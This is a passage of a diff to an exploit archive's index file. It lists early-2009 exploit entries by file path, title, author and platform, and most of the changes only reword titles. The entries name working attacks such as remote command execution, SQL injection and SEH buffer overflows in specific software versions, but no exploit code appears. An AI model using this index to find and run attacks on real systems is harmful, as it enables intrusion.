Multiple Vulnerabilities",2009-02-09,DNX,php,webapps,0 @@ -7543,8 +7544,8 @@ id,file,description,date,author,platform,type,port 8011,platforms/php/webapps/8011.txt,"BusinessSpace 1.2 - 'id' SQL Injection",2009-02-09,K-159,php,webapps,0 8012,platforms/php/webapps/8012.txt,"A Better Member-Based ASP Photo Gallery - (entry) SQL Injection",2009-02-09,BackDoor,php,webapps,0 8013,platforms/hardware/dos/8013.txt,"Nokia N95-8 - '.jpg' Remote Crash (PoC)",2009-02-09,"Juan Yacubian",hardware,dos,0 -8014,platforms/php/webapps/8014.pl,"PHP Director 0.21 - Remote Command Execution Exploit",2009-02-09,darkjoker,php,webapps,0 -8015,platforms/php/webapps/8015.pl,"Hedgehog-CMS 1.21 - Remote Command Execution Exploit",2009-02-09,darkjoker,php,webapps,0 +8014,platforms/php/webapps/8014.pl,"PHP Director 0.21 - Remote Command Execution",2009-02-09,darkjoker,php,webapps,0 +8015,platforms/php/webapps/8015.pl,"Hedgehog-CMS 1.21 - Remote Command Execution",2009-02-09,darkjoker,php,webapps,0 8016,platforms/php/webapps/8016.txt,"adaptcms lite 1.4 - (Cross-Site Scripting / Remote File Inclusion) Multiple Vulnerabilities",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0 8017,platforms/php/webapps/8017.txt,"SnippetMaster Webpage Editor 2.2.2 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0 8018,platforms/php/webapps/8018.txt,"FlexCMS - (catId) SQL Injection",2009-02-09,MisterRichard,php,webapps,0 @@ -7557,17 +7558,17 @@ id,file,description,date,author,platform,type,port 8025,platforms/php/webapps/8025.txt,"webframe 0.76 - Multiple File Inclusion",2009-02-09,ahmadbady,php,webapps,0 8026,platforms/php/webapps/8026.txt,"WB News 2.1.1 - config[installdir] Remote File Inclusion",2009-02-09,ahmadbady,php,webapps,0 8027,platforms/php/webapps/8027.txt,"Gaeste 1.6 - (gastbuch.php) Remote File Disclosure",2009-02-09,bd0rk,php,webapps,0 -8028,platforms/php/webapps/8028.pl,"Hedgehog-CMS 1.21 - (Local File Inclusion) Remote Command Execution Exploit",2009-02-09,Osirys,php,webapps,0 +8028,platforms/php/webapps/8028.pl,"Hedgehog-CMS 1.21 - (Local File Inclusion) Remote Command Execution",2009-02-09,Osirys,php,webapps,0 8029,platforms/php/webapps/8029.txt,"Thyme 1.3 - (export_to) Local File Inclusion",2009-02-10,cheverok,php,webapps,0 8030,platforms/php/webapps/8030.txt,"Papoo CMS 3.x - (pfadhier) Local File Inclusion",2009-02-10,SirGod,php,webapps,0 -8031,platforms/php/webapps/8031.pph,"q-news 2.0 - Remote Command Execution Exploit",2009-02-10,Fireshot,php,webapps,0 +8031,platforms/php/webapps/8031.pph,"q-news 2.0 - Remote Command Execution",2009-02-10,Fireshot,php,webapps,0 8032,platforms/php/webapps/8032.txt,"Potato News 1.0.0 - (user) Local File Inclusion",2009-02-10,x0r,php,webapps,0 8033,platforms/php/webapps/8033.txt,"AuthPhp 1.0 - (Authentication Bypass) SQL Injection",2009-02-10,x0r,php,webapps,0 8034,platforms/php/webapps/8034.txt,"Mynews 0_10 - (Authentication Bypass) SQL Injection",2009-02-10,x0r,php,webapps,0 8035,platforms/php/webapps/8035.txt,"BlueBird Pre-Release - (Authentication Bypass) SQL Injection",2009-02-10,x0r,php,webapps,0 -8036,platforms/php/webapps/8036.pl,"Fluorine CMS 0.1 rc 1 - File Disclosure / SQL Injection / Command Execution Exploit",2009-02-10,Osirys,php,webapps,0 +8036,platforms/php/webapps/8036.pl,"Fluorine CMS 0.1 rc 1 - File Disclosure / SQL Injection / Command Execution",2009-02-10,Osirys,php,webapps,0 8037,platforms/multiple/remote/8037.txt,"ProFTPd with mod_mysql - Authentication Bypass",2009-02-10,gat3way,multiple,remote,0 -8038,platforms/php/webapps/8038.py,"TYPO3 < 4.0.12/4.1.10/4.2.6 - (jumpUrl) Remote File Disclosure Exploit",2009-02-10,Lolek,php,webapps,0 +8038,platforms/php/webapps/8038.py,"TYPO3 < 4.0.12/4.1.10/4.2.6 - (jumpUrl) Remote File Disclosure",2009-02-10,Lolek,php,webapps,0 8039,platforms/php/webapps/8039.txt,"SkaDate Online 7 - Arbitrary File Upload",2009-02-11,ZoRLu,php,webapps,0 8040,platforms/php/webapps/8040.txt,"Graugon Gallery 1.0 - Cross-Site Scripting / SQL Injection / Cookie Bypass",2009-02-11,x0r,php,webapps,0 8041,platforms/windows/remote/8041.txt,"GeoVision Digital Video Surveillance System - (geohttpserver) DT",2009-02-11,"Dejan Levaja",windows,remote,0 @@ -7577,10 +7578,10 @@ id,file,description,date,author,platform,type,port 8045,platforms/php/webapps/8045.pl,"InselPhoto 1.1 - (query) SQL Injection",2009-02-11,Osirys,php,webapps,0 8046,platforms/php/webapps/8046.txt,"PHP Krazy Image Host Script 1.01 - (viewer.php id) SQL Injection",2009-02-12,x0r,php,webapps,0 8047,platforms/php/webapps/8047.txt,"Free Joke Script 1.0 - Authentication Bypass / SQL Injection",2009-02-12,Muhacir,php,webapps,0 -8048,platforms/asp/webapps/8048.txt,"Baran CMS 1.0 - Arbitrary ASP File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / CM",2009-02-12,"Aria-Security Team",asp,webapps,0 +8048,platforms/asp/webapps/8048.txt,"Baran CMS 1.0 - Arbitrary ASP File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / Cookie Manipulation",2009-02-12,"Aria-Security Team",asp,webapps,0 8049,platforms/php/webapps/8049.txt,"ideacart 0.02 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2009-02-13,nuclear,php,webapps,0 8050,platforms/php/webapps/8050.txt,"Vlinks 1.1.6 - 'id' SQL Injection",2009-02-13,JIKO,php,webapps,0 -8051,platforms/hardware/dos/8051.html,"Nokia N95-8 - browser (setAttributeNode) Method Crash Exploit",2009-02-13,"Juan Yacubian",hardware,dos,0 +8051,platforms/hardware/dos/8051.html,"Nokia N95-8 - browser (setAttributeNode) Method Crash",2009-02-13,"Juan Yacubian",hardware,dos,0 8052,platforms/php/webapps/8052.pl,"ea-gBook 0.1 - Remote Command Execution with Remote File Inclusion (c99) Exploit",2009-02-13,bd0rk,php,webapps,0 8053,platforms/php/webapps/8053.pl,"BlogWrite 0.91 - Remote File Disclosure / SQL Injection",2009-02-13,Osirys,php,webapps,0 8054,platforms/php/webapps/8054.pl,"CmsFaethon 2.2.0 - (info.php item) SQL Command Injection",2009-02-13,Osirys,php,webapps,0 @@ -7588,8 +7589,8 @@ id,file,description,date,author,platform,type,port 8057,platforms/php/webapps/8057.txt,"InselPhoto 1.1 - Persistent Cross-Site Scripting",2009-02-16,rAWjAW,php,webapps,0 8058,platforms/windows/dos/8058.pl,"TPTEST 3.1.7 - Stack Buffer Overflow (PoC)",2009-02-16,ffwd,windows,dos,0 8059,platforms/windows/remote/8059.html,"GeoVision LiveX 8200 - ActiveX (LIVEX_~1.OCX) File Corruption (PoC)",2009-02-16,Nine:Situations:Group,windows,remote,0 -8060,platforms/php/webapps/8060.php,"Falt4 CMS RC4 - 'FCKeditor' Arbitrary File Upload Exploit",2009-02-16,Sp3shial,php,webapps,0 -8061,platforms/php/webapps/8061.pl,"simplePms CMS 0.1.4 - Local File Inclusion / Remote Command Execution Exploit",2009-02-16,Osirys,php,webapps,0 +8060,platforms/php/webapps/8060.php,"Falt4 CMS RC4 - 'FCKeditor' Arbitrary File Upload",2009-02-16,Sp3shial,php,webapps,0 +8061,platforms/php/webapps/8061.pl,"simplePms CMS 0.1.4 - Local File Inclusion / Remote Command Execution",2009-02-16,Osirys,php,webapps,0 8062,platforms/php/webapps/8062.txt,"powermovielist 0.14b - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0 8063,platforms/php/webapps/8063.txt,"Novaboard 1.0.0 - Multiple Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0 8064,platforms/php/webapps/8064.pl,"MemHT Portal 4.0.1 - (pvtmsg) Delete All Private Messages Exploit",2009-02-16,StAkeR,php,webapps,0 @@ -7597,7 +7598,7 @@ id,file,description,date,author,platform,type,port 8066,platforms/php/webapps/8066.txt,"YACS CMS 8.11 - update_trailer.php Remote File Inclusion",2009-02-16,ahmadbady,php,webapps,0 8067,platforms/multiple/local/8067.txt,"Enomaly ECP / Enomalism < 2.2.1 - Multiple Local Vulnerabilities",2009-02-16,"Sam Johnston",multiple,local,0 8068,platforms/php/webapps/8068.txt,"ravennuke 2.3.0 - Multiple Vulnerabilities",2009-02-16,waraxe,php,webapps,0 -8069,platforms/php/webapps/8069.txt,"Grestul 1.x - Authentication Bypass by Cookie SQL Injection",2009-02-16,x0r,php,webapps,0 +8069,platforms/php/webapps/8069.txt,"Grestul 1.x - Authentication Bypass (via Cookie SQL Injection)",2009-02-16,x0r,php,webapps,0 8070,platforms/asp/webapps/8070.txt,"SAS Hotel Management System - Arbitrary File Upload",2009-02-17,ZoRLu,asp,webapps,0 8071,platforms/php/webapps/8071.txt,"S-CMS 1.1 Stable - Insecure Cookie Handling / Mass Page Delete Vulnerabilities",2009-02-17,x0r,php,webapps,0 8072,platforms/php/webapps/8072.txt,"pHNews Alpha 1 - 'header.php mod' SQL Injection",2009-02-17,x0r,php,webapps,0 @@ -7606,8 +7607,8 @@ id,file,description,date,author,platform,type,port 8075,platforms/php/webapps/8075.pl,"Firepack - 'admin/ref.php' Remote Code Execution",2009-02-18,Lidloses_Auge,php,webapps,0 8076,platforms/php/webapps/8076.txt,"smNews 1.0 - Authentication Bypass/Column Truncation Vulnerabilities",2009-02-18,x0r,php,webapps,0 8077,platforms/windows/dos/8077.html,"Microsoft Internet Explorer 7 - Memory Corruption (PoC) (MS09-002)",2009-02-18,anonymous,windows,dos,0 -8079,platforms/windows/remote/8079.html,"Microsoft Internet Explorer 7 (Windows XP SP2) - Memory Corruption Exploit (MS09-002)",2009-02-20,Abysssec,windows,remote,0 -8080,platforms/windows/remote/8080.py,"Microsoft Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (Python)",2009-02-20,"David Kennedy (ReL1K)",windows,remote,0 +8079,platforms/windows/remote/8079.html,"Microsoft Internet Explorer 7 (Windows XP SP2) - Memory Corruption (MS09-002)",2009-02-20,Abysssec,windows,remote,0 +8080,platforms/windows/remote/8080.py,"Microsoft Internet Explorer 7 - Memory Corruption (MS09-002) (Python)",2009-02-20,"David Kennedy (ReL1K)",windows,remote,0 8082,platforms/windows/remote/8082.html,"Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption PoC (MS09-002)",2009-02-20,webDEViL,windows,remote,0 8083,platforms/php/webapps/8083.txt,"phpBB 3 - (autopost bot mod 0.1.3) Remote File Inclusion",2009-02-20,Kacper,php,webapps,0 8084,platforms/windows/dos/8084.pl,"Got All Media 7.0.0.3 - (t00t) Remote Denial of Service",2009-02-20,LiquidWorm,windows,dos,0 @@ -7617,11 +7618,11 @@ id,file,description,date,author,platform,type,port 8088,platforms/php/webapps/8088.txt,"Osmodia Bulletin Board 1.x - (admin.txt) File Disclosure",2009-02-20,Pouya_Server,php,webapps,0 8089,platforms/php/webapps/8089.pl,"Graugon Forum 1 - 'id' SQL Command Injection",2009-02-20,Osirys,php,webapps,0 8090,platforms/windows/dos/8090.txt,"Multiple PDF Readers - JBIG2 Local Buffer Overflow (PoC)",2009-02-23,webDEViL,windows,dos,0 -8091,platforms/multiple/dos/8091.html,"Mozilla Firefox 3.0.6 - (BODY onload) Remote Crash Exploit",2009-02-23,Skylined,multiple,dos,0 +8091,platforms/multiple/dos/8091.html,"Mozilla Firefox 3.0.6 - (BODY onload) Remote Crash",2009-02-23,Skylined,multiple,dos,0 8092,platforms/php/webapps/8092.txt,"zFeeder 1.6 - 'admin.php' Pre-Authentication",2009-02-23,ahmadbady,php,webapps,0 -8093,platforms/php/webapps/8093.pl,"pPIM 1.01 - (notes.php id) Remote Command Execution Exploit",2009-02-23,JosS,php,webapps,0 -8094,platforms/php/webapps/8094.pl,"Free Arcade Script 1.0 - Local File Inclusion Command Execution Exploit",2009-02-23,Osirys,php,webapps,0 -8095,platforms/php/webapps/8095.pl,"Pyrophobia 2.1.3.1 - Local File Inclusion Command Execution Exploit",2009-02-23,Osirys,php,webapps,0 +8093,platforms/php/webapps/8093.pl,"pPIM 1.01 - (notes.php id) Remote Command Execution",2009-02-23,JosS,php,webapps,0 +8094,platforms/php/webapps/8094.pl,"Free Arcade Script 1.0 - Local File Inclusion Command Execution",2009-02-23,Osirys,php,webapps,0 +8095,platforms/php/webapps/8095.pl,"Pyrophobia 2.1.3.1 - Local File Inclusion Command Execution",2009-02-23,Osirys,php,webapps,0 8096,platforms/hardware/remote/8096.txt,"Optus/Huawei E960 HSDPA Router - Sms Cross-Site Scripting Attack",2009-02-23,"Rizki Wicaksono",hardware,remote,0 8097,platforms/multiple/remote/8097.txt,"MLdonkey 2.9.7 - HTTP DOUBLE SLASH Arbitrary File Disclosure",2009-02-23,"Michael Peselnik",multiple,remote,0 8098,platforms/php/webapps/8098.txt,"taifajobs 1.0 - (jobid) SQL Injection",2009-02-23,K-159,php,webapps,0 @@ -7633,7 +7634,7 @@ id,file,description,date,author,platform,type,port 8105,platforms/php/webapps/8105.txt,"ppim 1.0 - Multiple Vulnerabilities",2009-02-25,"Justin Keane",php,webapps,0 8106,platforms/hardware/dos/8106.txt,"Netgear WGR614v9 - Wireless Router Get Request Denial of Service",2009-02-25,staticrez,hardware,dos,0 8107,platforms/asp/webapps/8107.txt,"PenPal 2.0 - (Authentication Bypass) SQL Injection",2009-02-25,ByALBAYX,asp,webapps,0 -8108,platforms/osx/local/8108.c,"Apple Mac OS X xnu 1228.x - Local Kernel Memory Disclosure Exploit",2009-02-25,mu-b,osx,local,0 +8108,platforms/osx/local/8108.c,"Apple Mac OSX xnu 1228.x - Local Kernel Memory Disclosure",2009-02-25,mu-b,osx,local,0 8109,platforms/asp/webapps/8109.txt,"SkyPortal Classifieds System 0.12 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0 8110,platforms/asp/webapps/8110.txt,"SkyPortal Picture Manager 0.11 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0 8111,platforms/asp/webapps/8111.txt,"SkyPortal WebLinks 0.12 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0 @@ -7655,25 +7656,25 @@ id,file,description,date,author,platform,type,port 8129,platforms/windows/dos/8129.pl,"Novell eDirectory iMonitor - 'Accept-Language' Request Buffer Overflow (PoC)",2009-03-02,"Praveen Darshanam",windows,dos,0 8130,platforms/asp/webapps/8130.txt,"Document Library 1.0.1 - Arbitrary Change Admin",2009-03-02,ByALBAYX,asp,webapps,0 8131,platforms/asp/webapps/8131.txt,"Digital Interchange Calendar 5.7.13 - Contents Change",2009-03-02,ByALBAYX,asp,webapps,0 -8132,platforms/asp/webapps/8132.txt,"Access2asp - imageLibrary - Arbitrary File Upload (ASP)",2009-03-02,mr.al7rbi,asp,webapps,0 +8132,platforms/asp/webapps/8132.txt,"Access2asp - imageLibrary - (ASP) Arbitrary File Upload",2009-03-02,mr.al7rbi,asp,webapps,0 8133,platforms/php/webapps/8133.txt,"Graugon PHP Article Publisher 1.0 - (SQL Injection / Cookie Handling) Multiple Remote Vulnerabilities",2009-03-02,x0r,php,webapps,0 8134,platforms/php/webapps/8134.php,"Joomla com_digistore - 'pid' Blind SQL Injection",2009-03-02,InjEctOr5,php,webapps,0 8135,platforms/windows/dos/8135.pl,"Media Commands - '.m3u' / '.m3l' / '.TXT' / '.LRC' Files Local Heap Overflow (PoC)",2009-03-02,Hakxer,windows,dos,0 8136,platforms/php/webapps/8136.txt,"Joomla/Mambo Component eXtplorer - Code Execution",2009-03-02,"Juan Galiana Lara",php,webapps,0 -8137,platforms/windows/local/8137.py,"Media Commands - '.m3u' Local SEH Overwrite",2009-03-02,His0k4,windows,local,0 +8137,platforms/windows/local/8137.py,"Media Commands - '.m3u' Local Overwrite (SEH)",2009-03-02,His0k4,windows,local,0 8138,platforms/windows/local/8138.c,"VUplayer 2.49 - '.cue' Local Buffer Overflow",2009-03-02,"Assed Edin",windows,local,0 8139,platforms/php/webapps/8139.txt,"ritsblog 0.4.2 - (Authentication Bypass / Cross-Site Scripting) Multiple Vulnerabilities",2009-03-02,"Salvatore Fresta",php,webapps,0 8140,platforms/php/webapps/8140.txt,"Zabbix 1.6.2 Frontend - Multiple Vulnerabilities",2009-03-03,USH,php,webapps,0 8141,platforms/php/webapps/8141.txt,"blindblog 1.3.1 - (SQL Injection / Authentication Bypass / Local File Inclusion) Multiple Vulnerabilities",2009-03-03,"Salvatore Fresta",php,webapps,0 -8142,platforms/windows/remote/8142.py,"EFS Easy Chat Server - Authentication Request Buffer Overflow Exploit (SEH)",2009-03-03,His0k4,windows,remote,80 -8143,platforms/windows/remote/8143.html,"Sopcast SopCore Control - 'sopocx.ocx' Command Execution Exploit",2009-03-03,Nine:Situations:Group,windows,remote,0 +8142,platforms/windows/remote/8142.py,"EFS Easy Chat Server - Authentication Request Buffer Overflow (SEH)",2009-03-03,His0k4,windows,remote,80 +8143,platforms/windows/remote/8143.html,"Sopcast SopCore Control - 'sopocx.ocx' Command Execution",2009-03-03,Nine:Situations:Group,windows,remote,0 8144,platforms/windows/remote/8144.txt,"Imera ImeraIEPlugin - ActiveX Control Remote Code Execution",2009-03-03,Elazar,windows,remote,0 8145,platforms/php/webapps/8145.txt,"tghostscripter Amazon Shop - (Cross-Site Scripting / Directory Traversal / Remote File Inclusion) Multiple Vulnerabilities",2009-03-03,d3b4g,php,webapps,0 8148,platforms/multiple/dos/8148.pl,"Yaws < 1.80 - (Multiple headers) Remote Denial of Service",2009-03-03,"Praveen Darshanam",multiple,dos,0 -8149,platforms/windows/remote/8149.txt,"EFS Easy Chat Server - (Cross-Site Request Forgery) Change Admin Pass",2009-03-03,Stack,windows,remote,0 +8149,platforms/windows/remote/8149.txt,"EFS Easy Chat Server - (Cross-Site Request Forgery) Change Admin Password",2009-03-03,Stack,windows,remote,0 8150,platforms/php/webapps/8150.txt,"Novaboard 1.0.1 - (message) Persistent Cross-Site Scripting",2009-03-03,Pepelux,php,webapps,0 8151,platforms/php/webapps/8151.txt,"Jogjacamp JProfile Gold - (id_news) SQL Injection",2009-03-03,kecemplungkalen,php,webapps,0 -8152,platforms/windows/remote/8152.py,"Microsoft Internet Explorer 7 - Memory Corruption Exploit (MS09-002)",2009-03-04,"Ahmed Obied",windows,remote,0 +8152,platforms/windows/remote/8152.py,"Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)",2009-03-04,"Ahmed Obied",windows,remote,0 8154,platforms/windows/remote/8154.pl,"EFS Easy Chat Server - Authentication Request Buffer Overflow (Perl)",2009-03-04,Dr4sH,windows,remote,80 8155,platforms/windows/remote/8155.txt,"Easy File Sharing Web Server 4.8 - File Disclosure",2009-03-04,Stack,windows,remote,0 8156,platforms/windows/dos/8156.txt,"Easy Web Password 1.2 - Local Heap Memory Consumption (PoC)",2009-03-04,Stack,windows,dos,0 @@ -7681,7 +7682,7 @@ id,file,description,date,author,platform,type,port 8159,platforms/windows/local/8159.rb,"Media Commands - '.m3l' File Local Buffer Overflow",2009-03-05,Stack,windows,local,0 8160,platforms/windows/remote/8160.html,"SupportSoft DNA Editor Module - 'dnaedit.dll' Code Execution",2009-03-05,Nine:Situations:Group,windows,remote,0 8161,platforms/php/webapps/8161.txt,"celerbb 0.0.2 - Multiple Vulnerabilities",2009-03-05,"Salvatore Fresta",php,webapps,0 -8162,platforms/windows/local/8162.py,"Media Commands - '.m3u' Universal SEH Overwrite",2009-03-05,His0k4,windows,local,0 +8162,platforms/windows/local/8162.py,"Media Commands - '.m3u' Universal Overwrite (SEH)",2009-03-05,His0k4,windows,local,0 8163,platforms/bsd/dos/8163.txt,"Multiple Vendors libc:fts_*() - Local Denial of Service",2009-03-05,SecurityReason,bsd,dos,0 8164,platforms/php/webapps/8164.php,"Joomla com_ijoomla_archive - Blind SQL Injection",2009-03-05,Stack,php,webapps,0 8165,platforms/php/webapps/8165.txt,"Blue Eye CMS 1.0.0 - Remote Cookie SQL Injection",2009-03-06,ka0x,php,webapps,0 @@ -7689,12 +7690,12 @@ id,file,description,date,author,platform,type,port 8167,platforms/php/webapps/8167.txt,"isiAJAX 1 - 'praises.php id' SQL Injection",2009-03-06,dun,php,webapps,0 8168,platforms/php/webapps/8168.txt,"OneOrZero Helpdesk 1.6.5.7 - Local File Inclusion",2009-03-06,dun,php,webapps,0 8170,platforms/php/webapps/8170.txt,"nForum 1.5 - Multiple SQL Injections",2009-03-09,"Salvatore Fresta",php,webapps,0 -8171,platforms/windows/local/8171.py,"Nokia MultiMedia Player 1.0 - (Playlist) Universal SEH Overwrite",2009-03-09,His0k4,windows,local,0 +8171,platforms/windows/local/8171.py,"Nokia MultiMedia Player 1.0 - (Playlist) Universal Overwrite (SEH)",2009-03-09,His0k4,windows,local,0 8172,platforms/php/webapps/8172.txt,"cms s.builder 3.7 - Remote File Inclusion",2009-03-09,cr0w,php,webapps,0 8173,platforms/windows/remote/8173.txt,"Belkin BullDog Plus UPS-Service - Buffer Overflow",2009-03-09,Elazar,windows,remote,0 -8174,platforms/windows/local/8174.py,"Realtek Sound Manager 1.15.0.0 - Playlist SEH Overwrite",2009-03-09,His0k4,windows,local,0 +8174,platforms/windows/local/8174.py,"Realtek Sound Manager 1.15.0.0 - Playlist Overwrite (SEH)",2009-03-09,His0k4,windows,local,0 8175,platforms/windows/local/8175.txt,"mks_vir 9b < 1.2.0.0b297 - (mksmonen.sys) Privilege Escalation",2009-03-09,"NT Internals",windows,local,0 -8176,platforms/windows/local/8176.py,"EO Video 1.36 - Playlist SEH Overwrite",2009-03-09,His0k4,windows,local,0 +8176,platforms/windows/local/8176.py,"EO Video 1.36 - Playlist Overwrite (SEH)",2009-03-09,His0k4,windows,local,0 8177,platforms/windows/local/8177.py,"RadASM 2.2.1.5 - '.rap' Local Stack Overflow",2009-03-09,zAx,windows,local,0 8178,platforms/windows/local/8178.pl,"Mediacoder 0.6.2.4275 - '.m3u' Universal Stack Overflow",2009-03-09,Stack,windows,local,0 8179,platforms/windows/local/8179.rb,"Mediacoder 0.6.2.4275 - Universal Buffer Overflow (SEH)",2009-03-09,Stack,windows,local,0 @@ -7710,7 +7711,7 @@ id,file,description,date,author,platform,type,port 8189,platforms/windows/local/8189.txt,"VUPlayer 2.49 - '.cue' Universal Buffer Overflow",2009-03-10,Stack,windows,local,0 8190,platforms/windows/dos/8190.txt,"IBM Director 5.20.3su2 CIM Server - Remote Denial of Service",2009-03-10,"Bernhard Mueller",windows,dos,0 8191,platforms/multiple/remote/8191.txt,"NextApp Echo < 2.1.1 - XML Injection",2009-03-10,"SEC Consult",multiple,remote,0 -8193,platforms/windows/local/8193.py,"RainbowPlayer 0.91 - (Playlist) Universal SEH Overwrite",2009-03-10,His0k4,windows,local,0 +8193,platforms/windows/local/8193.py,"RainbowPlayer 0.91 - (Playlist) Universal Overwrite (SEH)",2009-03-10,His0k4,windows,local,0 8194,platforms/php/webapps/8194.txt,"PHP-Fusion Mod Book Panel - (course_id) SQL Injection",2009-03-10,SuB-ZeRo,php,webapps,0 8195,platforms/php/webapps/8195.txt,"WeBid 0.7.3 RC9 - Multiple Remote File Inclusion",2009-03-10,K-159,php,webapps,0 8196,platforms/php/webapps/8196.txt,"WordPress MU < 2.7 - 'HOST' HTTP Header Cross-Site Scripting",2009-03-10,"Juan Galiana Lara",php,webapps,0 @@ -7763,7 +7764,7 @@ id,file,description,date,author,platform,type,port 8248,platforms/windows/remote/8248.py,"POP Peeper 3.4.0.0 - (From) Remote Buffer Overflow (SEH)",2009-03-20,His0k4,windows,remote,0 8249,platforms/windows/local/8249.php,"BS.Player 2.34 Build 980 - '.bsl' Local Buffer Overflow (SEH)",2009-03-20,Nine:Situations:Group,windows,local,0 8250,platforms/windows/local/8250.txt,"CloneCD/DVD ElbyCDIO.sys < 6.0.3.2 - Privilege Escalation",2009-03-20,"NT Internals",windows,local,0 -8251,platforms/windows/local/8251.py,"BS.Player 2.34 - '.bsl' Universal SEH Overwrite",2009-03-20,His0k4,windows,local,0 +8251,platforms/windows/local/8251.py,"BS.Player 2.34 - '.bsl' Universal Overwrite (SEH)",2009-03-20,His0k4,windows,local,0 8252,platforms/php/webapps/8252.txt,"pixie CMS - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-03-20,"Justin Keane",php,webapps,0 8253,platforms/windows/remote/8253.c,"Racer 0.5.3b5 - Remote Stack Buffer Overflow",2009-03-20,"fl0 fl0w",windows,remote,0 8254,platforms/php/webapps/8254.pl,"WBB3 rGallery 1.2.3 - (UserGallery) Blind SQL Injection",2009-03-23,Invisibility,php,webapps,0 @@ -7774,20 +7775,20 @@ id,file,description,date,author,platform,type,port 8259,platforms/freebsd/dos/8259.c,"FreeBSD 7.x - (Dumping Environment) Local Kernel Panic Exploit",2009-03-23,kokanin,freebsd,dos,0 8260,platforms/hardware/dos/8260.txt,"Gigaset SE461 WiMAX router - Remote Denial of Service",2009-03-23,Benkei,hardware,dos,0 8261,platforms/freebsd/local/8261.c,"FreeBSD 7.0/7.1 - (ktimer) Kernel Privilege Escalation",2009-03-23,mu-b,freebsd,local,0 -8262,platforms/osx/dos/8262.c,"Apple Mac OS X xnu 1228.3.13 - (zip-notify) Remote Kernel Overflow (PoC)",2009-03-23,mu-b,osx,dos,0 -8263,platforms/osx/dos/8263.c,"Apple Mac OS X xnu 1228.3.13 - (macfsstat) Local Kernel Memory Leak/Denial of Service",2009-03-23,mu-b,osx,dos,0 -8264,platforms/osx/dos/8264.c,"Apple Mac OS X xnu 1228.3.13 - (profil) Kernel Memory Leak/Denial of Service (PoC)",2009-03-23,mu-b,osx,dos,0 -8265,platforms/osx/dos/8265.c,"Apple Mac OS X xnu 1228.x - (vfssysctl) Local Kernel Denial of Service (PoC)",2009-03-23,mu-b,osx,dos,0 -8266,platforms/osx/local/8266.txt,"Apple Mac OS X xnu 1228.x - (hfs-fcntl) Kernel Privilege Escalation",2009-03-23,mu-b,osx,local,0 -8267,platforms/windows/local/8267.py,"Zinf Audio Player 2.2.1 - '.pls' Universal Seh Overwrite",2009-03-23,His0k4,windows,local,0 -8268,platforms/php/webapps/8268.php,"PHPizabi 0.848b C1 HFP1-3 - Remote Command Execution Exploit",2009-03-23,YOUCODE,php,webapps,0 +8262,platforms/osx/dos/8262.c,"Apple Mac OSX xnu 1228.3.13 - (zip-notify) Remote Kernel Overflow (PoC)",2009-03-23,mu-b,osx,dos,0 +8263,platforms/osx/dos/8263.c,"Apple Mac OSX xnu 1228.3.13 - (macfsstat) Local Kernel Memory Leak/Denial of Service",2009-03-23,mu-b,osx,dos,0 +8264,platforms/osx/dos/8264.c,"Apple Mac OSX xnu 1228.3.13 - (profil) Kernel Memory Leak/Denial of Service (PoC)",2009-03-23,mu-b,osx,dos,0 +8265,platforms/osx/dos/8265.c,"Apple Mac OSX xnu 1228.x - (vfssysctl) Local Kernel Denial of Service (PoC)",2009-03-23,mu-b,osx,dos,0 +8266,platforms/osx/local/8266.txt,"Apple Mac OSX xnu 1228.x - (hfs-fcntl) Kernel Privilege Escalation",2009-03-23,mu-b,osx,local,0 +8267,platforms/windows/local/8267.py,"Zinf Audio Player 2.2.1 - '.pls' Universal Overwrite (SEH)",2009-03-23,His0k4,windows,local,0 +8268,platforms/php/webapps/8268.php,"PHPizabi 0.848b C1 HFP1-3 - Remote Command Execution",2009-03-23,YOUCODE,php,webapps,0 8269,platforms/hardware/remote/8269.txt,"Rittal CMC-TC Processing Unit II - Multiple Vulnerabilities",2009-03-23,"Louhi Networks",hardware,remote,0 8270,platforms/windows/local/8270.pl,"eXeScope 6.50 - Local Buffer Overflow",2009-03-23,Koshi,windows,local,0 8271,platforms/php/webapps/8271.php,"Pluck CMS 4.6.1 - (module_pages_site.php post) Local File Inclusion",2009-03-23,"Alfons Luja",php,webapps,0 -8272,platforms/php/webapps/8272.pl,"Codice CMS 2 - SQL Command Execution Exploit",2009-03-23,darkjoker,php,webapps,0 +8272,platforms/php/webapps/8272.pl,"Codice CMS 2 - SQL Command Execution",2009-03-23,darkjoker,php,webapps,0 8273,platforms/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - (Post-Authentication) Multiple Vulnerabilities",2009-03-23,"Jonathan Salwan",windows,remote,0 -8274,platforms/windows/local/8274.pl,"POP Peeper 3.4.0.0 - '.eml' Universal SEH Overwrite",2009-03-23,Stack,windows,local,0 -8275,platforms/windows/local/8275.pl,"POP Peeper 3.4.0.0 - '.html' Universal SEH Overwrite",2009-03-23,Stack,windows,local,0 +8274,platforms/windows/local/8274.pl,"POP Peeper 3.4.0.0 - '.eml' Universal Overwrite (SEH)",2009-03-23,Stack,windows,local,0 +8275,platforms/windows/local/8275.pl,"POP Peeper 3.4.0.0 - '.html' Universal Overwrite (SEH)",2009-03-23,Stack,windows,local,0 8276,platforms/php/webapps/8276.pl,"Syzygy CMS 0.3 - Local File Inclusion / SQL Command Injection",2009-03-23,Osirys,php,webapps,0 8277,platforms/php/webapps/8277.txt,"Free Arcade Script 1.0 - Authentication Bypass (SQL Injection) / Arbitrary File Upload",2009-03-23,Mr.Skonnie,php,webapps,0 8278,platforms/php/webapps/8278.txt,"Jinzora Media Jukebox 2.8 - (name) Local File Inclusion",2009-03-24,dun,php,webapps,0 @@ -7798,18 +7799,18 @@ id,file,description,date,author,platform,type,port 8283,platforms/windows/remote/8283.c,"Femitter FTP Server 1.x - (Post-Authentication) Multiple Vulnerabilities",2009-03-24,"Jonathan Salwan",windows,remote,0 